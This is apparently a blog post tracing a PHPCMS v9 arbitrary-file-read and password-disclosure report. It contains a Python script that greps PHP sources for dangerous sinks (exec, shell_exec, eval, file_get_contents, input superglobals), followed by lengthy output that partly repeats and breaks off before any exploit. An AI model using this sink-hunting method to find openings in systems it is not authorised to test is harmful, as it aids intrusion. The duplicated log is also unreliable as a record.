- 浏览: 632105 次
- 性别:
- 来自: 西安
文章分类
最新评论
-
d1438138:
[img][/img]
google api 的一些神奇使用 -
waykingeye:
[i][b][u]引用[list]
[*][img][url] ...
No result defined for action and result input -
tss0823:
...
No result defined for action and result input -
yahier:
有什么办法能够捕捉,然后给出自定义的提示呢
No result defined for action and result input -
chen_lian:
恩恩 按照上面的代码测试一下觉得很对
java创建目录
1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072
有人报告phpcms v9 直接爆密码
开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光爆密码没啥用啊?
2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09463的补充
我记得这个漏洞开始报的是一个xss,实质则是一个file_get_contents的问题,就变成了任意文件浏览的问题
3 下来就是如何构造和如何找的问题了,
我先利用了pfind 查找file_get_contents,得到如下结果:
#/usr/bin/python import os from sys import argv class pfind: #hm=open("123.htm","r+") allfile=[] allpt=[] fun=["$_REQUEST","$_GET","$_POST","$_FILE","fput","fread","fwrite","file_get_contents","file_put_contents"] #fun=["include","include_once","require","require_once","show_source"] #fun=["eval","preg_replace+/e","assert","call_user_func","call_user_func_array","create_function"] #fun=["get_rid"] #fun=["select ","update","insret","$_SERVER","$_POST","$_COOKIE","$_REQUEST","$_FILES","$_ENV","$_HTTP_COOKIE_VARS","$_HTTP_ENV_VARS","$_HTTP_GET_VARS","$_HTTP_POST_FILES","$_HTTP_POST_VARS","$_HTTP_SERVER_VARS","system","exec","passthru","shell_exec","popen","proc_open","eval","assert","fwrite","fput","fread","file_put_contents","move_uploaded_file"] def getfl (self,fl): for i in os.listdir(fl): if os.path.isdir(fl+"\\"+i)==True: ft=fl+"\\"+i self.getfl(ft) elif os.path.isfile(fl+"\\"+i)==True: self.findfun(fl+"\\"+i) # self.allfile.append(fl+"\\"+i) def findfun (self,fl): ln=1 try: fl.split(".php") except: exit fp=open(fl,"r+") while True: line=fp.readline() if line: x=0 while x< len(self.fun): if self.fun[x] in line : #print print "[+] File: "+fl print "[+] Line: "+str(ln) print "[+] Have: "+self.fun[x] print "[+] Code: "+line x=x+1 else: break ln=ln+1 def vfind (self,fl,val): ln=1 fp=open(fl,"r+") while True: line=fp.readline() if line: if val in line: print "[+] File: "+fl print "[+] Have: "+val print "[+] Line: "+str(ln) print "[+] Code: "+line else: break #''' try: c=argv[1] if c=="-p": a=pfind() a.getfl(argv[2]) elif c=="-f": a=pfind() a.fun=[argv[3]] a.getfl(argv[2]) except: print "[+] Code By Cond0r QQ 707447667" print "[+] Blog Pythoner.blog.com" print "[+] usage: "+argv[0]+" -p c:\\1\\" print "[+] usage: "+argv[0]+" -f c:\\1\\ $value" #''' #a=pfind() #a.vfind("D:\DTServer\www\\22\\admin_permissions.php","a")
写道
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $license = file_get_contents(PHPCMS_PATH."install/license.txt");
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 78
[+] Have: file_get_contents
[+] Code: $returnid = @file_get_contents($remote_url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 216
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 276
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 330
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/testsql.sql");
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 468
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 484
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\cache_file.class.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\ip_area.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $data = $xml->xml_unserialize(@file_get_contents($api_url));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 34
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 55
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 143
[+] Have: file_get_contents
[+] Code: $str .= '$json = @file_get_contents(\''.$datas['url'].'\');';
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 150
[+] Have: file_get_contents
[+] Code: $str .= '$xml_data = @file_get_contents(\''.$datas['url'].'\');';
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\dir.func.php
[+] Line: 75
[+] Have: file_get_contents
[+] Code: file_put_contents($v, iconv($in_charset, $out_charset, file_get_contents($v)));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1561
[+] Have: file_get_contents
[+] Code: function pc_file_get_contents($url, $timeout=30) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1563
[+] Have: file_get_contents
[+] Code: return @file_get_contents($url, 0, $stream);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 262
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 266
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 383
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MEMBER_MODEL_PATH.'member_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 387
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MEMBER_MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\card.class.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents(self::$server_url.$url)) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 42
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->installdir.$m.'.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 52
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 182
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->uninstalldir.$m.'.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 320
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 329
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\functions\global.func.php
[+] Line: 49
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\index.php
[+] Line: 288
[+] Have: file_get_contents
[+] Code: $snda_res_json = @file_get_contents($snda_check_url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 44
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 230
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_applist&s='.$s.'&p='.$p);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 233
[+] Have: file_get_contents
[+] Code: $recommed_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_recommed_applist&s=5&p=1');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 236
[+] Have: file_get_contents
[+] Code: $focus_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_app_focus&num=3');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 252
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 268
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 337
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 377
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\cnzz\index.php
[+] Line: 22
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents('http://wss.cnzz.com/user/companion/phpcms.php?domain='.APP_PATH.'&key='.$key.'&cms=phpcms')) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\classes\collection.class.php
[+] Line: 218
[+] Have: file_get_contents
[+] Code: if (!empty($url) && $html = @file_get_contents($url)) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\node.php
[+] Line: 154
[+] Have: file_get_contents
[+] Code: $data = json_decode(base64_decode(file_get_contents($filename)), true);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 135
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 139
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 195
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 206
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 26
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'formguide_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 30
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\formguide.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $create_sql = file_get_contents(MODEL_PATH.'create.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'member_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 32
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\OauthSDK.class.php
[+] Line: 578
[+] Have: file_get_contents
[+] Code: @file_get_contents($url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 47
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 58
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 107
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 133
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 201
[+] Have: file_get_contents
[+] Code: $res = @file_get_contents($url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\file.php
[+] Line: 82
[+] Have: file_get_contents
[+] Code: $data = htmlspecialchars(file_get_contents($filepath));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 8
[+] Have: file_get_contents
[+] Code: $data = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $data = @file_get_contents($filepath);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 65
[+] Have: file_get_contents
[+] Code: $template_bak_db->insert(array('creat_at'=>SYS_TIME,'fileid'=>$style."_".$dir."_".$filename, 'userid'=>param::get_cookie('userid'), 'username'=>param::get_cookie('admin_username'), 'template'=>new_addslashes(file_get_contents($filepath))));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\style.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: $code = json_decode(base64_decode(file_get_contents($filename)), true);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $pathlist_str = @file_get_contents($upgrade_path_base);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 69
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 99
[+] Have: file_get_contents
[+] Code: if (strtolower(substr($file_list[$fk], -3, 3)) == 'sql' && $data = file_get_contents($file_list[$fk])) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 131
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($menu_lan_file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 187
[+] Have: file_get_contents
[+] Code: $phpcms_md5 = @file_get_contents($this->_upgrademd5.$current_version['pc_release'].'_'.CHARSET.".php");
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\api\uc.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $post = xml_unserialize(file_get_contents('php://input'));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\cache_file.class.php
[+] Line: 74
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 27
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 43
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\applications.php
[+] Line: 156
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents($url.'code='.urlencode($param))) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\system.php
[+] Line: 56
[+] Have: file_get_contents
[+] Code: $html = file_get_contents($filepath);
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $license = file_get_contents(PHPCMS_PATH."install/license.txt");
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 78
[+] Have: file_get_contents
[+] Code: $returnid = @file_get_contents($remote_url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 216
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 276
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 330
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/testsql.sql");
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 468
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 484
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\cache_file.class.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\ip_area.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $data = $xml->xml_unserialize(@file_get_contents($api_url));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 34
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 55
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 143
[+] Have: file_get_contents
[+] Code: $str .= '$json = @file_get_contents(\''.$datas['url'].'\');';
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 150
[+] Have: file_get_contents
[+] Code: $str .= '$xml_data = @file_get_contents(\''.$datas['url'].'\');';
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\dir.func.php
[+] Line: 75
[+] Have: file_get_contents
[+] Code: file_put_contents($v, iconv($in_charset, $out_charset, file_get_contents($v)));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1561
[+] Have: file_get_contents
[+] Code: function pc_file_get_contents($url, $timeout=30) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1563
[+] Have: file_get_contents
[+] Code: return @file_get_contents($url, 0, $stream);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 262
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 266
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 383
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MEMBER_MODEL_PATH.'member_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 387
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MEMBER_MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\card.class.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents(self::$server_url.$url)) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 42
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->installdir.$m.'.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 52
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 182
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->uninstalldir.$m.'.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 320
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 329
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\functions\global.func.php
[+] Line: 49
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\index.php
[+] Line: 288
[+] Have: file_get_contents
[+] Code: $snda_res_json = @file_get_contents($snda_check_url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 44
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 230
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_applist&s='.$s.'&p='.$p);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 233
[+] Have: file_get_contents
[+] Code: $recommed_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_recommed_applist&s=5&p=1');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 236
[+] Have: file_get_contents
[+] Code: $focus_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_app_focus&num=3');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 252
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 268
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 337
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 377
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\cnzz\index.php
[+] Line: 22
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents('http://wss.cnzz.com/user/companion/phpcms.php?domain='.APP_PATH.'&key='.$key.'&cms=phpcms')) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\classes\collection.class.php
[+] Line: 218
[+] Have: file_get_contents
[+] Code: if (!empty($url) && $html = @file_get_contents($url)) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\node.php
[+] Line: 154
[+] Have: file_get_contents
[+] Code: $data = json_decode(base64_decode(file_get_contents($filename)), true);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 135
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');
